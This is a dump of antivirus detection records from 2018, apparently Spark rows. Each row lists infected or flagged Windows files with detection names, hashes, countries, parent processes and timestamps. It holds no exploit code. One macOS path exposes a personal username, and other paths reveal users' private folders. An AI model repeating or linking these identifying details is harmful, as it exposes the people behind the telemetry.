  Row(detection=Row(filename='systembooster_x64.dll', filepath='\\\\?\\C:\\ProgramData\\System Booster\\SystemBooster_x64.dll', filesize=4160000, name='TR/BProtector.Gen.#M300.#R8258'), hash='deff17bbab195f71a97f63351d79731a246f80eb36820336b52c48cbbf2d3e0e', metadata=Row(cmdline=None, country='IT', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T14:02:05Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00292f05', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00292f05', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:20:41Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vpnoriginal1.exe', filepath='c:\\users\\X\\desktop\\work\\humanscale\\kosten\\reisekosten\\vpnoriginal1.exe', filesize=192000, name='SPR/QuickBatch.Gen.#M1.#R1'), hash='e832deb5d195c3a16f542d75927c957b48f75205146e7c24735331d11e9bdda6', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Windows\\explorer.exe', parentsize=3932672, timestamp='2018-11-04T12:07:07Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-140840-39368b1b', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-131819-F64932D1\\AVSCAN-20181104-140840-39368B1B', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T13:08:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a0011104.exe', filepath='h:\\system volume information\\_restore{d91319e2-a444-4f72-ae88-de668da52f71}\\rp2\\A0011104.EXE', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='ac3ad7f61f6dc403b5f27868d83c18089121ab71f92f18e1144cbba694fce2c0', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc=None, parentsize=None, timestamp='2018-11-04T19:40:12Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp00294c45', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp00294c45', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:47:40Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='searchprotocolhost.exe', filepath='C:\\Windows\\System32\\SearchProtocolHost.exe', filesize=192000, name='W32/Virut.Gen.#M1.#R1'), hash='d957b4ff0646abd39096b7b3b7f7431ca47fc4e84421eb2e8664afee59485aa7', metadata=Row(cmdline='\\\\\\/Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchIndexer.exe', parentsize=428032, timestamp='2018-11-04T23:58:47Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:38:36Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='back graund.exe', filepath='H:\\\xa0\\Back graund\\Back graund.exe', filesize=0, name='WORM/Taranis.2225.#M0.#R0'), hash='e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-04T12:57:25Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='zemax.exe', filepath='D:\\__big\\_cad 65\\Zemax OpticStudio 13 Release 2 Sp4 Premium\\1\\zemax.exe', filesize=17536000, name='W32/Infector.Gen8.#M300.#R700734'), hash='ff573d5ea1cd7a2912ddc3892e1a23c4ddeac81ae1525b27f0f6216155c86646', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\totalcmd\\TOTALCMD64.EXE', parentsize=8849464, timestamp='2018-11-04T19:48:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='libtcmalloc.dll', filepath='C:\\Program Files\\Garena\\Garena\\2.0.1808.1611\\libtcmalloc.dll', filesize=448000, name='W32/Ramnit.C.#M1.#R1'), hash='f0436525a43a8ddea447dc6005e768916dba3f7f362054ecd3214f1b496e65a6', metadata=Row(cmdline=None, country='TH', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=748336, timestamp='2018-11-04T02:31:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='updater_zip_res0301_newmm[2].exe', filepath='\\\\?\\C:\\Windows\\System32\\config\\systemprofile\\AppData\\Local\\Microsoft\\Windows\\Temporary Internet Files\\Content.IE5\\Updater_zip_res0301_newmm[2].exe', filesize=10368000, name='ADWARE/ELEX.Gen.#M300.#R7708'), hash='f062a67cda8a7166a774b121aaaed4283fc49b671084b55745a7262df0b7b65e', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T09:25:04Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{EC6F2C17-FD0A-4CBB-BF5F-B973B9BA79FA}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='f63a35fdaa330db8c95a8702c31b2a4ee0f457c0ae00fdd4bed7e90c101caa91', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-01T01:01:29Z'), dt=datetime.date(2018, 11, 1)),
  Row(detection=Row(filename='zlib.dll', filepath='D:\\العاب\\Mortal kombat 5\\Jewel Quest\\zlib.dll', filesize=236000, name='W32/Ramnit.C.#M1.#R1'), hash='f524a35e2a79d61f93412fbeba6d77758815b4a89d1dce5c778e12c4823bd743', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-01T10:05:34Z'), dt=datetime.date(2018, 11, 1))],
 [Row(detection=Row(filename='gohan.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Gohan\\Gohan.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='161b399824da2e7687bf2c7bc304a0d615bedc65ba7682613d2299aff37b74a8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup.exe', filepath='C:\\Users\\X\\Desktop\\datos\\Documents and Settings\\pc\\Escritorio\\back up\\Adobe Illustrator Installer\\Illustrator 10\\Installer\\Setup.exe', filesize=128000, name='W32/Sality.AT.#M1.#R1'), hash='5caba6ff2320ec54114ddb1c4a726fcf8e303f25a2bd9970cd32e276fa95ed36', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:t3AtiNa3b0Svm0xl.1', country='AR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=122536, timestamp='2018-11-02T12:21:11Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yahoo! powered lecor', filepath='C:\\Windows\\System32\\Tasks\\Yahoo! Powered lecor', filesize=4000, name='HTML/ExpKit.Gen.#M1.#R1'), hash='20f94b9918d2d4b8ba837df710b9f8b32efc249a3f913cf61e67c410e41599f4', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T00:28:20Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tmp00010635', filepath='C:\\Windows\\Temp\\bdcore_tmp\\2124\\tmp000016d6\\tmp00010635', filesize=12288000, name='HEUR/AGEN.1011420.#M1.#R1'), hash='232827a10e7717a61e6aeeeaa301081da048a2d57bc73450d4667ddb9752ff16', metadata=Row(cmdline='\\\\\\/service', country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Bitdefender\\Endpoint Security\\EPSecurityService.exe', parentsize=94952, timestamp='2018-11-02T01:33:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='whdata.exe', filepath='I:\\ألعاب\\Games 1\\اندر جرون الجديدة\\TRACKS\\Support\\EA Help\\whdata\\whdata.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='17a9a38c64d2134df3247b8862ab2b03e72125afe4a474a1710510651bc1362d', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:57Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='C:\\Program Files (x86)\\Avira\\Antivirus\\AviraSecurityCenterAgent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T17:53:25Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='parcel.bat', filepath='D:\\DOKUMENKU\\SUBID APUPPT\\PARCEL\\PARCEL.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:47:50Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='maintenancesservices.dll', filepath='C:\\Windows\\System32\\MaintenancesServices.dll', filesize=576000, name='TR/Vools.mlupg.#M1.#R1'), hash='13ab3d572b30a77009d8d417be0cce6774b7590a302ac0e6f9843e1ba693a243', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:25:21Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='media.bat', filepath='C:\\Users\\X\\Recorded TV\\Sample Media\\Media.bat', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T03:10:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-160010-ee590a6f', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_0858748c\\AVSCAN-20181102-155607-D410DE34\\AVSCAN-20181102-160010-EE590A6F', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T09:00:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bdpdbx25.dll', filepath='C:\\Program Files (x86)\\Embarcadero\\RAD Studio\\7.0\\bin\\bdpdbx25.dll', filesize=256000, name='W32/Ramnit.CD.#M1.#R1'), hash='14286411a9f892fac4ddd456e5d41c0e10c651e976c8045077376ec547485e9f', metadata=Row(cmdline=None, country='CN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Users\\X\\AppData\\Roaming\\360se6\\Application\\360se.exe', parentsize=1190912, timestamp='2018-11-02T08:58:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmlaunch.exe', filepath='\\\\?\\C:\\Program Files\\Windows Media Player\\wmlaunch.exe', filesize=256000, name='W32/Virut.Gen.#M1.#R1'), hash='00a3c546e50bcc946116950568bae407695fab708ed30c3bc73da15e28374224', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:15:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='software.exe', filepath='C:\\Users\\X\\Foxit Software\\Software.exe', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='4d9bfb574ec75e8583e5331b3f54b33c5500c8e5a86d66ba52669f425c06cede', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe3_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe3 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T03:10:18Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='bg-appendix1500.html', filepath='C:\\Users\\X\\AppData\\Local\\VirtualStore\\Program Files\\Canon\\IJ Manual\\CANON MP230 SERIES\\Indonesian\\BG\\Bg-Appendix1500.html', filesize=220000, name='VBS/Ramnit.abcd.#M1.#R1'), hash='17d040a44dd8ac3bb9074686c0fa31a11f5470b8babc9e6ac3819e970f077e39', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Internet Explorer\\iexplore.exe', parentsize=673048, timestamp='2018-11-02T15:41:34Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avirasecuritycenteragent.exe', filepath='c:\\program files\\avira\\antivirus\\avirasecuritycenteragent.exe', filesize=840000, name='W32/Sality.Patched.#M1.#R1'), hash='4d3390f1bd3f6b3986e670c2eabfea2e528541ac16d0a33f07254858aaf4e781', metadata=Row(cmdline='\\/LOGFILE=\\"C:\\\\ProgramData\\\\Avira\\\\Antivirus\\\\LOGFILES\\\\AviraSecurityCenterAgent-2018-11-02-07-05-09.log\\" \\/LOGLEVEL=\\"STANDARD\\" \\/UPDATE_WSC=\\"ENABLE\\" \\/VDFDATE=\\"2018-10-22T00:00:00\\" \\/TRIGGER=\\"gpschd.dll Cyclic Check\\"', country='BO', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\Avira\\Antivirus\\sched.exe', parentsize=248312, timestamp='2018-11-02T21:15:28Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='zbkketin.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\zbkketin.exe', filesize=1856000, name='HEUR/AGEN.1015900.#M1.#R1'), hash='4211746b020025be2362634cf7b6c5fe84b1386938edb7df4890edb2c8e51d91', metadata=Row(cmdline=None, country='MX', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:04:08Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='opp.dll', filepath='C:\\Program Files\\Adobe\\Photoshop 7.0\\OPP.dll', filesize=324000, name='W32/Ramnit.C.#M0.#R0'), hash='38ab6f24defb4d07089a31f303d17eb60b266579d6c6160fb63547c77870618b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='3', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T08:21:54Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='yamicsoft_aio_5in1_v2.4_keygen_uret.exe', filepath='\\\\?\\C:\\Users\\X\\Desktop\\Yamicsoft_AIO_5in1_v2.4_Keygen_URET.exe', filesize=1788000, name='HEUR/AGEN.1023554.#M1.#R1'), hash='057fa680c3f495aa6309f249083f3eba9504ecf9a397217fd0a711f1303e32aa', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T22:12:13Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='consoleapplication1.exe', filepath='\\\\?\\C:\\Users\\X\\Documents\\Visual Studio 2017\\Projects\\EmptyProject1\\x64\\Debug\\ConsoleApplication1.exe', filesize=64000, name='HEUR/APC.#M1.#R1'), hash='28b528023ad5d69fb89488a4da2e8e74173bbc4a0e0c17a8e31392086cabd6b4', metadata=Row(cmdline=None, country='AU', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T20:13:47Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='tracks.exe', filepath='I:\\ألعاب\\Games 1\\بولنج\\MIXOLGY.NET_Bowling.Hawaiian.Vacationd. _By  MIDOPOP\\sfx\\tracks\\tracks.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='71b3716790f24005c718fe95ca3d648c80c4a4af6d9ddc9a4a0ced9ef91a9f7c', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe1_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe1 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T18:25:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='clickjogos - sirenix surfistas - winx club.exe', filepath='C:\\Users\\X\\Documents\\DRAFTS\\Cotações  2016\\ClickJogos - Sirenix Surfistas - Winx Club.exe', filesize=2288000, name='PUA/InstallCore.Gen.#M300.#R8158'), hash='348888a26e74093c0f08d368a961257b96b0f5c4533a693746bef050d1b8d0cf', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T18:28:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:32:41Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:07:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='~1a02f2cb.tmp', filepath='/Users/ralfdressler/Dropbox/.dropbox.cache/~1a02f2cb.tmp', filesize=128000, name='HEUR/AGEN.1008383.#M15.#R1008383'), hash='413fe9a5c16921a255eb2eca53d943c08089ac54b246501d5424ce0b27341c2d', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T23:58:46Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-155925-6265ffa3', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_45e3c45c\\AVSCAN-20181102-155854-5DC787B7\\AVSCAN-20181102-155925-6265FFA3', filesize=268000, name='PUA/CryptoMiner.Gen.#M1.#R1'), hash='2a8c955e352e926965365975b18880dde4ab7b2259b797afeaa2ca981577b677', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:59:29Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='ma tran toan 5.exe', filepath='G:\\\xa0\\NAM HOC 2017-2018n\\ma tran toan 5.exe', filesize=1664000, name='TR/ATRAPS.Gen4.#M300.#R300784'), hash='0cd1a613e871e459906b02e7a504ac121fec2540a552c77ff1b0398b976a99d0', metadata=Row(cmdline=None, country='VN', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2872320, timestamp='2018-11-02T10:08:44Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:46:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-103554-9d2b2e60', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_378b0c32\\AVSCAN-20181102-103514-965051F5\\AVSCAN-20181102-103554-9D2B2E60', filesize=4736000, name='HEUR/APC.#M1.#R1'), hash='4836fc0c6e1cc6e085550b43cb0a166129544aff6f11100aa0de83467149530b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:36:01Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:29:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-193945-3c90d6f6', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AVSCAN-20181102-193911-3877A267\\AVSCAN-20181102-193945-3C90D6F6', filesize=1024000, name='Adware/CsdiMonetize.tygrq.#M1.#R1'), hash='2d0d1b5b0610e0163d0d7ac12d5c0810b882f929c789ae3d1b6039214139c2d4', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:39:38Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:55:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:28:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:41:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T08:00:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:48:52Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:17:07Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='newfolder.exe', filepath='E:\\NewFolder.exe', filesize=512000, name='TR/Patched.Ren.Gen.#M2.#R4458'), hash='3723934078893bddb8cacdd1bf725083fbfb8c5ae509fc64632ac34eddabc9f5', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T07:42:15Z'), dt=datetime.date(2018, 11, 2)),
